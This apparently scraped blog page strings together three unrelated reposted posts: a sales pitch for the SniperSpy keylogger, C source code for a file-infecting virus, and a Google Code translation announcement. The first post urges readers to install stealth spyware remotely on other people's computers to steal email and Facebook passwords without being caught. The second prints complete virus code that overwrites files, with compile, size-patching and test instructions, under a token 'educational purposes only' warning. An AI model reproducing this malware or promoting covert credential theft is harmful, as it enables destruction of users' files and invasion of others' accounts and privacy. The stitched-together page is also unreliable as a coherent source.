Les nouveautés et Tutoriels de Votre Codeur | SEO | Création de site web | Création de logiciel

Seo Master present to you:

 

The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware.   If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.

 

Easily Access any Email

 

1. You can ACCESS ANY PASSWORD

With SniperSpy, you can gain access to any password protected material such as Facebook, MySpace or any other email account.

2. REMOTE INSTALL Feature

SniperSpy has a Remote Install feature using which it makes it possible to install this software on a remote computer. This feature can be very handy when you do not have physical access to the target computer on which you want to install this software.

3. MONITOR EVERY ACTIVITY on the Target Computer

With SniperSpy, you can not only capture the passwords, but also spy on their IM conversations and take screenshots of the activities on the target computer.

4. NEVER GET CAUGHT

Since SniperSpy runs in a complete stealth mode, it’s presence on the target computer remains undetected. So you need not worry about being caught or traced back.

5. Extremely EASY TO USE

Since SniperSpy is designed for novice computer users, it requires no special skills to install and use.

6. Works on Both PC and MAC

SniperSpy is fully compatible with Windows 2000/XP/Vista/7 and Mac.

Can I Install SniperSpy on a Local Computer?

Yes, you can install SniperSpy on a Local or Remote computer. It supports both Remote and Local installations. So, you need not worry whether it is a local or a remote computer.

How Safe is to Use SniperSpy?

SniperSpy is completely safe and secure since it neither collects any information from your computer nor contact you in any way.

So, what are you waiting for? Go, grab it now and expose the truth!

Click Here to Download SniperSpy for Windows

Click Here to Download SniperSpy for Mac

 

 

 

Solution:

Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

2013, By: Seo Master

Seo Master present to you:

 

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

 

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

 

 

 

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE



2013, By: Seo Master
Seo Master present to you:

Developers speak lots of languages, not just English and C++. We know that you use Google Code from all over the world, and we understand that the love of a good API is universal.

We're excited to announce that developer content on Google Code is now available in five new languages: Chinese, Japanese, Portuguese, Russian, and Spanish. Many of our pages, such as the site directory and landing pages for the various APIs have already been translated. You will also find that some of the deeper technical documentation, such as the Chart API and Maps API, has also been translated where appropriate. Where we haven't translated the content yet, you will continue to see the English version of the site.

We'll be working to keeping this content up-to-date, and we're looking forward to adding more support for languages and APIs throughout the year.

Update: Corrected to read "in five new languages." The sixth language, of course, is English.

2013, By: Seo Master
Powered by Blogger.